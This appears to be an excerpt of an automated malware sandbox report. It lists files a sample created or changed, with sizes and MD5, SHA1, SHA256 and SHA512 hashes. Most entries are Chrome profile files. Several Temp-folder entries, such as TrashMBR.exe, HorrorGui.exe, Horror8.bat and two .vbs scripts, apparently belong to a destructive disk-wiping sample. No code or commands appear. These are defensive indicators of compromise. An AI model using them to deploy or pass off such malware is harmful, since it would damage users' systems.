                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                        Filesize

                                                                        3KB

                                                                        MD5

                                                                        b173ff7b5d91acecceed934a340f777c

                                                                        SHA1

                                                                        6b275af14dd8d0c0a7c63459ca30fe18a4aaa489

                                                                        SHA256

                                                                        175e2220b36199b4799e1b41e7a249d6b94d297ba829eeb07ce5a3453fddbb4d

                                                                        SHA512

                                                                        8801bb4f5e9ae4b9b3046e5de0bc29b5b22140068c67836062a8ce525a29483acf0f7ce9da371af3c0915050dd78451c3ef585785c2c752fd45d8eb59bc93954

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                        Filesize

                                                                        3KB

                                                                        MD5

                                                                        a5b6379b33565bb845ceee05d012e2a2

                                                                        SHA1

                                                                        f17c883b4eb59df01018681b7d9b3d0b002f5cbe

                                                                        SHA256

                                                                        178aaa0fb14ad3834e9af032ec22399ce92639715339af7aaee4e0f072843559

                                                                        SHA512

                                                                        206b15a2ac8acf545d896675cc4691ae139208252046fdd5ffd16f8ea97d0a95cb5b40be4cc091e0be9e973c8d10ef325671b0e486a86cf8f29226d6a2cddbc6

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                                                        Filesize

                                                                        18KB

                                                                        MD5

                                                                        cee883c52eaa2c11c60f46b8775f5863

                                                                        SHA1

                                                                        d398165a5e7d13ae84f264e4379a06ddba538e81

                                                                        SHA256

                                                                        0a10eb44e4044c018c39a43ea66ffb26ce404cd7e61466d2ed35c10a811fff53

                                                                        SHA512

                                                                        1c3e0ae33865feca47f38748715ec55099e42d5c1b885e1969df69b854a3fbdd02d6e363127c855488bac4f398facfdb668dcff2272f27e8a242061d25a75566

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                                        Filesize

                                                                        2B

                                                                        MD5

                                                                        d751713988987e9331980363e24189ce

                                                                        SHA1

                                                                        97d170e1550eee4afc0af065b78cda302a97674c

                                                                        SHA256

                                                                        4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                        SHA512

                                                                        b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                        Filesize

                                                                        4KB

                                                                        MD5

                                                                        57222f5cd7c47b8f1142cb629dcbd7db

                                                                        SHA1

                                                                        3798f25d3abd52b1a1502ad87ed2efd6da5ae36b

                                                                        SHA256

                                                                        f2cad746e115910d1784747ae225ef1ad4f1b41fd1d63dbf57fbb6e3dfca7dfc

                                                                        SHA512

                                                                        9ee17e4190d1da078b89929a71c7bfbbb9f79a1564b9e7d5584cf56cec8ecda3fd8db6c080455f069118119a15e0731588511493e05777c61aa745dd9d305dba

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                        Filesize

                                                                        3KB

                                                                        MD5

                                                                        38c075f7d5e51c326fb53669c797eb04

                                                                        SHA1

                                                                        c7220c16265c6f248e4a31bd65b4bf6bc90fb5c8

                                                                        SHA256

                                                                        049a3cd89be54c93436b1e600cc3cb52b6d105b566ccf6a06cd32f437b9ba191

                                                                        SHA512

                                                                        6c5d2aa91aa49ad03a4eb34909f611c7a569fb5039b161c591fae1ab844ba32e16cdd8f981f4144e0f52c8cbe280579a4500d179b761bf63e47c68ca91838977

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                        Filesize

                                                                        4KB

                                                                        MD5

                                                                        c98af95f8a50f39df0d0b437078a6175

                                                                        SHA1

                                                                        6d77bb4f08b0e05c2c3fff7793b43c1d39c958f8

                                                                        SHA256

                                                                        d4a4ea763d1c45cca31275cddf04dffe91a7ebd38e560b00d3016e98ecc393ab

                                                                        SHA512

                                                                        a0026644c5e1e303339fd7f3b60c94f5f18f2a25e8aabf7953a06c3701b501232fc3a474465a7a37ef0758e4ea3810f08ada3b4008cf67a07cda604b83e567a2

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                        Filesize

                                                                        3KB

                                                                        MD5

                                                                        0eea6d152b04add5da3209ab9d2c68be

                                                                        SHA1

                                                                        7ab387cc91c3984a6b09ec132695f84455734f0c

                                                                        SHA256

                                                                        e829f1d9d617d9868122a9a445156014c6e49ed8cd9a17f47806d127508a797b

                                                                        SHA512

                                                                        8ad4205853ab171a172b3aa21eb271bb3fa8dde4ac256ad358f4cdccf8112d4809a148a3843380cf761693b20f5b44773b6fcafff2aab0c38f5307eec425e5b0

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                        Filesize

                                                                        4KB

                                                                        MD5

                                                                        5c5c05718d17c16541b8736cecdd9e1b

                                                                        SHA1

                                                                        aa7f8607f8b5fcfaf2020167ab1c4802cdb2fa86

                                                                        SHA256

                                                                        fa9468474889451207f325debd6bcf040d9853de95c8a7f28488c8dd8f19fe66

                                                                        SHA512

                                                                        5a3d2ce44d3e3f365ac895b82f2b7636ec3f0df6ad2e55e1e74c15fa38da25c60b9c15b8be777b11a1fd96b0eb1dbdb32ff60485b2d762d65de741bec8e5f4b2

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                        Filesize

                                                                        3KB

                                                                        MD5

                                                                        0f5cacc113d4b023cbd357eab7006ad8

                                                                        SHA1

                                                                        790d72fd36c52810200db834685b80b2c418a070

                                                                        SHA256

                                                                        00b93d90ff3a5c93d9ba98e9d022d1b262e67903b98ef08efa0bdb120b6ae956

                                                                        SHA512

                                                                        73b389c283f4d2c6bb5460c498af3f373af33a46478a2c8f934429296be134619b30049107f845da05d80f8ad333e5f61c580c3f33fc35ab5b1f40460c0e8509

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                        Filesize

                                                                        4KB

                                                                        MD5

                                                                        7ad3c5a015f6adf1671ac73533042f85

                                                                        SHA1

                                                                        ee479288a912e967ff4f9c701e561fbbbb2e117a

                                                                        SHA256

                                                                        5505f00608a2ae260e4927f7a4e120d86796b5e19da9b85a6698511e67223a4d

                                                                        SHA512

                                                                        996985086dd5390d88f55d3c60a58b2d48b704232a69827c7a05085032615ff3b0eabded3460c55bb1e4f3aeae73d4ec89dd463013620de7446ed1940dceae61

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                        Filesize

                                                                        1KB

                                                                        MD5

                                                                        24f38c69943da8faae1ab228755c4b9c

                                                                        SHA1

                                                                        db5884d027e3faba4c7f6d2a2db52beb4fce9f83

                                                                        SHA256

                                                                        1b50635181f031e418562b8e8bcd8a725bda47efdd404ea2db5f95e03e8801e5

                                                                        SHA512

                                                                        4bab5eead53add620bf63fc0292fe1fed27e0d3964dcb6da3df135eb4b04c427accccf6340a51d846b6895dd9c3ea4cdbd2fc6aac4a467a2908056190a9f8f28

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                        Filesize

                                                                        11KB

                                                                        MD5

                                                                        90cb2f5ccfd7d2da5c73f22064ee9663

                                                                        SHA1

                                                                        f3dda9968cac7ce8f6d122fafbac63f164faf17a

                                                                        SHA256

                                                                        e97b4bcc54a6b27c3a62dac7a7446a04e6f18de257f1b1f3dd6e288d6d75c52b

                                                                        SHA512

                                                                        29cc7182b05acc2bc1ed49affa1cf5c96dac6be5d40e8333b1ad03f22b0d6d792adb0b173425fb66ce1d10f90de1a574e60928f75543d75edeee790d9d877126

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                        Filesize

                                                                        11KB

                                                                        MD5

                                                                        5dbd89d534fa2f55e5579e69412ed30c

                                                                        SHA1

                                                                        4c407565e1e712a5ac2130c3a56edb0771f82d46

                                                                        SHA256

                                                                        7328eb93c74720433f97c097119fce03fceecd03fb922c74dd79c00b6583a9d2

                                                                        SHA512

                                                                        f8bb771ccf1afa75bd6cfbe541571a4b778eaf61a628090b194040edddf24ef5b1246a94cd4981df4ba0adda29092185d3fcfaa88a607a19f95d7627379c259a

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                        Filesize

                                                                        11KB

                                                                        MD5

                                                                        aedaff5f1006cadbcd0195879bae3c97

                                                                        SHA1

                                                                        10716b6f811aec104b98a4c34bbcaa574320603f

                                                                        SHA256

                                                                        fde44aa06e5cc23a22d02638c0a512b33d65b8bf597dafc99249f565ddb12ea5

                                                                        SHA512

                                                                        edf71eb4eed7a0a78235777306de8749eb2ce065178e64dfe5ce9fe825050a93315ff02745e44762d1c5c60e5f62cd5309e98da7ab4f5d32549438b49dcd1fdb

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                        Filesize

                                                                        11KB

                                                                        MD5

                                                                        71008aba0df527f0d6a5e9e9caa32575

                                                                        SHA1

                                                                        ff62a42d311ddd352375cf8af46be7cf657dc291

                                                                        SHA256

                                                                        0b73ca1e4f6d67ae3944cd33953c1d766679b97e2684407a34893386e7cec52d

                                                                        SHA512

                                                                        555a08e863e34ab85bbf759eead09ca4720429aa9c6425eb110d21c5d11bf611f78d9cb3da672a826b9895f68c25b10ae75133fcbc01ceb2584512671504a24a

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                        Filesize

                                                                        11KB

                                                                        MD5

                                                                        4c4ccceb2c315f6d254c16f399aa3566

                                                                        SHA1

                                                                        f9df35e17cc520f29bf2cf862da46eeb340aae6a

                                                                        SHA256

                                                                        bc5cc122a8467c818f95d309ff7618c0d305f55c8f7ea8771ef7d7097b6cf611

                                                                        SHA512

                                                                        879a1c0962ce7bdd486623ba94f0fefb715f11e652e8f01aa9386fc2ffbbcd67094335c65e53d5ea3c1f0d4b1e45afb7249f18ed65fb8a1dd5cfbec765dc97d5

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                        Filesize

                                                                        11KB

                                                                        MD5

                                                                        5d8469fee3b297559556d069ea7f146f

                                                                        SHA1

                                                                        7d8fa50d4a17d7ddf6c5994c7f0cfe5a69669920

                                                                        SHA256

                                                                        da08f9848959291f541dcfbad55a412ed7fab677a4ae746d1a383b37eaf80fd1

                                                                        SHA512

                                                                        5dbfb9116d4f6dad0667ce106dcb5e3ec8c17f7d3eb85bd3fc05bb015f5d654c8dc095c170d9c3a3a893e9aa772dc318e42684650c34df4d1cf119ba5d6ec344

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                        Filesize

                                                                        10KB

                                                                        MD5

                                                                        1627fcd0a4ab529773dd8d0754b7128e

                                                                        SHA1

                                                                        4b8dd152bec3e51dc7d3b692b7e61cc3ece52b80

                                                                        SHA256

                                                                        062644c3c21d3055e908fdb3c8e4e62bd40ec101b8e40352cc1407a60e131baa

                                                                        SHA512

                                                                        19c455e57bb110ca4b9e39bfb79e2085fd604b37a81c55fde46d24eb6e27874ba818061f34c2fe936ec62020a4c233a575f1a467e4505ea2325eca998cd23008

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                        Filesize

                                                                        11KB

                                                                        MD5

                                                                        342663946e7920a5ed80399392a3c0e2

                                                                        SHA1

                                                                        7af85f9c24d64986d73c9420d0f096bfea252b9a

                                                                        SHA256

                                                                        743601677b36e17924ccc13e0a235d7ed443fc2d94db035ddfb76b7b94ac0098

                                                                        SHA512

                                                                        94db3559701da384a7b4a17d44dc45d421028f640467d6042419e1dffdeaa707f3a2d5fe96f5a47692433099a27e20133a8be0ecae121d00ed5bab3c739ab195

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                        Filesize

                                                                        11KB

                                                                        MD5

                                                                        60689ce03a9bd9eccafa5cea4c4624ac

                                                                        SHA1

                                                                        8370b6a5290c085b13e01d4cc1b353f976f5f87d

                                                                        SHA256

                                                                        8a4f2b9814e1ef378520756cf57dcfd5e78bdf2773093545745d382fa24b30b9

                                                                        SHA512

                                                                        100439f6c0faf6a9f187f9c800110a83107e115df2fe6a37f577fc1b36a108d38666c15f9d2d06564a5bf5b079d7a53e0ba4cd96190d6c63018ac6a5ddbde36f

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                        Filesize

                                                                        9KB

                                                                        MD5

                                                                        1e4ef151f753d10fa475be00467d224e

                                                                        SHA1

                                                                        b032ba2b89545a8f94bd0eb77379babc732fe825

                                                                        SHA256

                                                                        eb08cd20deb51fbcd40a2b3d5bf7328ec8752d5047dc6b871b7cc6bc2c853e86

                                                                        SHA512

                                                                        33e85bf7194ab5f328564dd5a9a9bd27704e3e2306d6d6cd35f664a104cc7fc96023589b5ae249a417d2a20a081537a0bdfe3e7335626a9f34b4dddb504237ed

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                        Filesize

                                                                        11KB

                                                                        MD5

                                                                        8c65551e20d0aa1958104eca2f2965ea

                                                                        SHA1

                                                                        decbf839c199cf0976f1125a080454dd910eee95

                                                                        SHA256

                                                                        7814b95f446a61104c849fd03985f7af46c9f0fa08cc6c81387e8f1f23b4603d

                                                                        SHA512

                                                                        19d13d15878327fb183dd29676eae136e37cc062e8728d95c36745bdb1944b43ada8aea129886aac2b62ff315985694ac1752cb7ac057f8ca00bfcf44a716481

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                        Filesize

                                                                        11KB

                                                                        MD5

                                                                        c625631fcaafa48965b094f4b48458e7

                                                                        SHA1

                                                                        4c7ff6c0c6ef21ee5e97013eb3a25dd5ee9ae910

                                                                        SHA256

                                                                        942d19461ed6c53cb7e5deffb7e0cd0ecc2af50815a64820227f7dcde1874fb1

                                                                        SHA512

                                                                        79c9631d4f8078d8dbc043150b6b2bd2d2cce7ea58fe06c29f3be07f30f41107e9fe54326409bf78bef74c48c18e43649fdcd2f293d103ea70f50026fc8e3fde

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                        Filesize

                                                                        11KB

                                                                        MD5

                                                                        0ec1e6b2d0dcf609c6b10512178afe22

                                                                        SHA1

                                                                        b5ccbe975aba939195823f01e79585461c389c62

                                                                        SHA256

                                                                        624a5b2aad80db2930920c50b110791ca2ae10f93e98f20430bf2df91cf1d8bf

                                                                        SHA512

                                                                        5de574f5525031c30a578af78b7867ac8127110c61437336aef6f2a8883848efca20be8037f1b91905ba90591dd56d8425545ef0b2c35b6d30b2afa76e2cd9b9

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                        Filesize

                                                                        9KB

                                                                        MD5

                                                                        07956dae19cf29c3c1ca0b00b7fe8c0d

                                                                        SHA1

                                                                        03016a39b71f3fa863d74a644a7bf8b93107a263

                                                                        SHA256

                                                                        5693f99061a4345cba193719dce45ee0773ffe227d5c6f0ea02ae7f5c8bbc266

                                                                        SHA512

                                                                        29f813f876553d2c637312ca18056be807331cbcdf6e36f0efb1897fb3eaf25357d729ab123384974d9e75a1f131fce3821358abc2b84c28615fe34e8cec0bf0

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                        Filesize

                                                                        10KB

                                                                        MD5

                                                                        54dbc2e4ad3a17fe6a1d9c5967013d07

                                                                        SHA1

                                                                        2c15bc1600296840b87b1328083f9b29a79c85cc

                                                                        SHA256

                                                                        0aab5e3dccc76968652619ea6e6893bbe60f8c48b7339cb8fcf9639271fe7286

                                                                        SHA512

                                                                        b8d3c73110e30ec57c4b13cd10332309509595134024adfe455a356b945b867e024d0bbb881b3447d3280d9f7eb83988d837b792d6079fa947b0043db197c2c6

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                        Filesize

                                                                        10KB

                                                                        MD5

                                                                        9f42181691d139139f41d6b94c329b93

                                                                        SHA1

                                                                        60c927dba42f0b8be81bb3f8b1c2f53b92465b59

                                                                        SHA256

                                                                        673bd276510871e117317dbf4ed3332e4283500a9b6b9dd85a0862cdddf8aabe

                                                                        SHA512

                                                                        a48e69b840789e192f9af7938af6a44aa068af7369e2764ddb263e1b4ebf901feb3c015733a4d142873e7c99ec057bcd55d4154eebd845835ff7749f798d1142

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                        Filesize

                                                                        11KB

                                                                        MD5

                                                                        5cd6576209129c975e8be21ba02c7d68

                                                                        SHA1

                                                                        b3d58e166688f7c7da2a2b89e5517b3f5adf612f

                                                                        SHA256

                                                                        3e7e5429e7af2de6ea4c0134b6695b36ed2f3c41014ce458f1fb49b7f6598fa9

                                                                        SHA512

                                                                        5831f3e2e33ff32440f8721255d82a767abf289424ad9b45105102b26f5a06448cbc21b1070470a106b98c7d3b3905d96053cac6981d96880c7c6616e8b253b2

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                        Filesize

                                                                        11KB

                                                                        MD5

                                                                        5ce33f6c7ce3e2cfec067a06b1f40162

                                                                        SHA1

                                                                        7260f65ca4457bc13b37e0b167c5537d30baf5e1

                                                                        SHA256

                                                                        46e81faefa085645c3a887a59c5a1dc2ca83694f3c014124d6e73528c4028a9a

                                                                        SHA512

                                                                        5037f4235922f7ec910aff89f96cc01cd977a86a712b5bd02d2748428bbe94bff8324930f4452b3b7353354405ea0d10568a6f2832a53628500d01eef19327fe

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                        Filesize

                                                                        11KB

                                                                        MD5

                                                                        84353a032b1972b16af3f87b2f140318

                                                                        SHA1

                                                                        c22743eb03c819256a147e8f80966d285051c081

                                                                        SHA256

                                                                        f6a7295102cca922988985f1306d28df2d5ea27e0729712d9b6b0d2fa0663b9a

                                                                        SHA512

                                                                        0919025f46ab538985ba6bd96e4e614b87c2cde256a7b257a6efcf8e07c7dfc94c4926f93f78e5bd4284c62b18bfbca3d8b92eb90b4f7998ef38bb248c1dacca

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                        Filesize

                                                                        116KB

                                                                        MD5

                                                                        def41a182930b455473dfd42aea265cb

                                                                        SHA1

                                                                        1f9e0d034881ac8dfd1d3b066d671323e52f3029

                                                                        SHA256

                                                                        d1a38d39ebc525bd9c54ea41039edec1d403e2fde98fcdf2009ef1ff7d963d61

                                                                        SHA512

                                                                        af29aba257edfac890be7b46fd17049fe32802986ad9ae96e3ae15e37663cf454b8406a8ab94b3a7d6b237022b3bcaf290dd49059424a6caf7d92fc610ec8f3b

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                        Filesize

                                                                        116KB

                                                                        MD5

                                                                        73567f3948f7e05b113999096a96653d

                                                                        SHA1

                                                                        8da5fc879bb249aa09dd48ecb7f52cb886f5d587

                                                                        SHA256

                                                                        3ce6645c00210eee7c04f221b1eb8c10b0705a9d98750cbb8333449538448708

                                                                        SHA512

                                                                        66de2d58cba1ea45e720f4da0befe7647cf236b3d244de427f83e3fa1355bddb3a8cac09d950f5815cf7c0ae6aac2219c515089ad89040b1d319b61a421c1f39

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                        Filesize

                                                                        116KB

                                                                        MD5

                                                                        76a218a2bd4371bfb084e31657ad72fa

                                                                        SHA1

                                                                        01902c2b65c834940001c80b29d959dad0e017e5

                                                                        SHA256

                                                                        a1b9ed928651b48a8e0f5eb6f1bc4e17c618722a899a42b5ecf29ec27d3b41ed

                                                                        SHA512

                                                                        78799f8c03ea17fceee53bfb0fa0caefdac134faa9c75af801db7a6429af94a4c91dac97ad166eaa00a53b7d8564bd190953a8284494bccf9b31e7a76c1f13eb

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                        Filesize

                                                                        116KB

                                                                        MD5

                                                                        b355aa56797f07aa400e2fdc10d97a76

                                                                        SHA1

                                                                        b34687ae5a0f46ffbbc35e9b144ea4ad627c0779

                                                                        SHA256

                                                                        2a8f4e6fe138fa5b15f0a25c2b823ec3ffb5f43903a7d401f260a9164f739ea8

                                                                        SHA512

                                                                        39ee76e77dca82d0a01c67e2e13a023f2c3ce21fba3be4f8a198b2b9f539724db1ce666a97bdfdd631afade91b2308a2929e1e11a979a7ddee900d201abdaf8a

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

                                                                        Filesize

                                                                        64KB

                                                                        MD5

                                                                        987a07b978cfe12e4ce45e513ef86619

                                                                        SHA1

                                                                        22eec9a9b2e83ad33bedc59e3205f86590b7d40c

                                                                        SHA256

                                                                        f1a4a978ce1c4731df1594043135cf58d084fdf129dd1c8e4507c9e06eac5ea8

                                                                        SHA512

                                                                        39b86540e4d35c84609ef66537b5aa02058e3d4293f902127c7d4eac8ffc65920cb5c69a77552fc085687eed66e38367f83c177046d0ecb8e6d135463cc142aa

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML

                                                                        Filesize

                                                                        9KB

                                                                        MD5

                                                                        7050d5ae8acfbe560fa11073fef8185d

                                                                        SHA1

                                                                        5bc38e77ff06785fe0aec5a345c4ccd15752560e

                                                                        SHA256

                                                                        cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b

                                                                        SHA512

                                                                        a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

                                                                      • C:\Users\Admin\AppData\Local\Temp\ED5F.tmp\ED60.tmp\ED61.vbs

                                                                        Filesize

                                                                        710B

                                                                        MD5

                                                                        3bafc447cf86b66198f84690cb592adb

                                                                        SHA1

                                                                        5d16e560003b0ca1efa914aa0960fa84dbe1a0a6

                                                                        SHA256

                                                                        b96a442adc718e9e0981b1c3bea2c8172f6c5b2c8c1fecda5c311c95728bafff

                                                                        SHA512

                                                                        f0aaef88ff735c8823cf83bf513a95084ccc617aa97bfed8ee86dc1366ae8cef679a7b5bf48116370493e0074fd7f56ce7e5e9f22bfbd8dd6f2f7c8489419700

                                                                      • C:\Users\Admin\AppData\Local\Temp\ED5F.tmp\Horror8.bat

                                                                        Filesize

                                                                        915B

                                                                        MD5

                                                                        36fcf85ec52716f5fd8ea625a11c13c6

                                                                        SHA1

                                                                        60a720249c6bb3617e904445c247487dba96af9c

                                                                        SHA256

                                                                        3aba2d676284209730ff20b28a8415a3c41c88f402301b14437040bf2baebe0c

                                                                        SHA512

                                                                        1ba72a3ea4cf1014f0072184067611448276fff273f803c829d1f6bbeb6dd24c7dca41eada5b78f2ddc7dabadf5c5a66e11cd4f8a5aea31d261a69ef186d09f6

                                                                      • C:\Users\Admin\AppData\Local\Temp\ED5F.tmp\HorrorGui.exe

                                                                        Filesize

                                                                        308KB

                                                                        MD5

                                                                        b2653aa06a2253e8155eb81535b20e6a

                                                                        SHA1

                                                                        0cf61fc537d8d73c71724febd0f1f34a6fddc838

                                                                        SHA256

                                                                        b4e106e22c4d3e51c87d3d5853298210572ab2834f5e2a0beaf1df7d96c57d29

                                                                        SHA512

                                                                        143694740660ac46f0c6c78903e8378fd402b5338dfb68c3e4a148f6f83036eaea3be6bda160d59ed1c5b52ba235823e284a0564ab9dbedcc3d3a6e40584fd98

                                                                      • C:\Users\Admin\AppData\Local\Temp\ED5F.tmp\TrashMBR.exe

                                                                        Filesize

                                                                        47KB

                                                                        MD5

                                                                        87f09f4a202bf9c0adcf6fed942aa703

                                                                        SHA1

                                                                        96bf11ff017e31ec2242c0024c372628c40cbd4f

                                                                        SHA256

                                                                        acf8abe9bd2f61840a247b4796ebedad20f69a85dbdf8a4100f5d7d306b064b1

                                                                        SHA512

                                                                        85202719aa875b2697ae3082a79a3ca7c1e1be377d6b19f9f159488a5f9d6ec6e9ec35352b067a1bc15546165764acb108c11203bf482ea43684e433717eee58

                                                                      • C:\Users\Admin\AppData\Local\Temp\ED5F.tmp\clingclang.wav

                                                                        Filesize

                                                                        13.1MB

                                                                        MD5

                                                                        1c723b3b9420e04cb8845af8b62a37fa

                                                                        SHA1

                                                                        3331a0f04c851194405eb9a9ff49c76bfa3d4db0

                                                                        SHA256

                                                                        6831f471ee3363e981e6a1eb0d722f092b33c9b73c91f9f2a9aafa5cb4c56b29

                                                                        SHA512

                                                                        41f4005ec2a7e0ee8e0e5f52b9d97f25a64a25bb0f00c85c07c643e4e63ea361b4d86733a0cf719b30ea6af225c4fcaca494f22e8e2f73cda9db906c5a0f12ae

                                                                      • C:\Users\Admin\AppData\Local\Temp\ED5F.tmp\music.vbs

                                                                        Filesize

                                                                        227B

                                                                        MD5

                                                                        8b703f9c48eb3724348af746e7610061

                                                                        SHA1

                                                                        599aa1820096e92546ea8d863d46cc49404e19e6

                                                                        SHA256

                                                                        e8cd555c43973e3b2e6fa0e80d602abc3d7c43a17bc51a6d0ba08e20ea3feadd

                                                                        SHA512

                                                                        d38e39e3f9ff71f68d3d851b635bcc27939656ec085369652a324d8b0c95042e722a07b0b06a0a25f0f2b51d5ad1addc3174c472bda3f86cbf28376ba4870208

                                                                      • C:\Users\Admin\Downloads\Unconfirmed 984095.crdownload

                                                                        Filesize

                                                                        12.4MB

                                                                        MD5

                                                                        846d847d9b1247c57824d5d2601a7faf

                                                                        SHA1

                                                                        2119dccee1e98af31fd193cf38bbfd8614f183bb

                                                                        SHA256

                                                                        ba8fa2c240edfc35c3078fcf31b87c0e1af4404dfc1f52e0d5640edb061355fc

                                                                        SHA512

                                                                        8cbad0562c13f997fd2e90e6f3a998cdbd2c207592c1d85e6bcf5c794a65bbf2322355a33c9d1af4f03519447c397e7b34dfea179c30d1a054d32d6031c723ec

                                                                      • \??\pipe\crashpad_4728_IPYWWFNRJTQDWSNV

                                                                        MD5

                                                                        d41d8cd98f00b204e9800998ecf8427e

                                                                        SHA1

                                                                        da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                        SHA256

                                                                        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                        SHA512

                                                                        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                      • memory/2320-721-0x0000000000400000-0x0000000000412000-memory.dmp

                                                                        Filesize

                                                                        72KB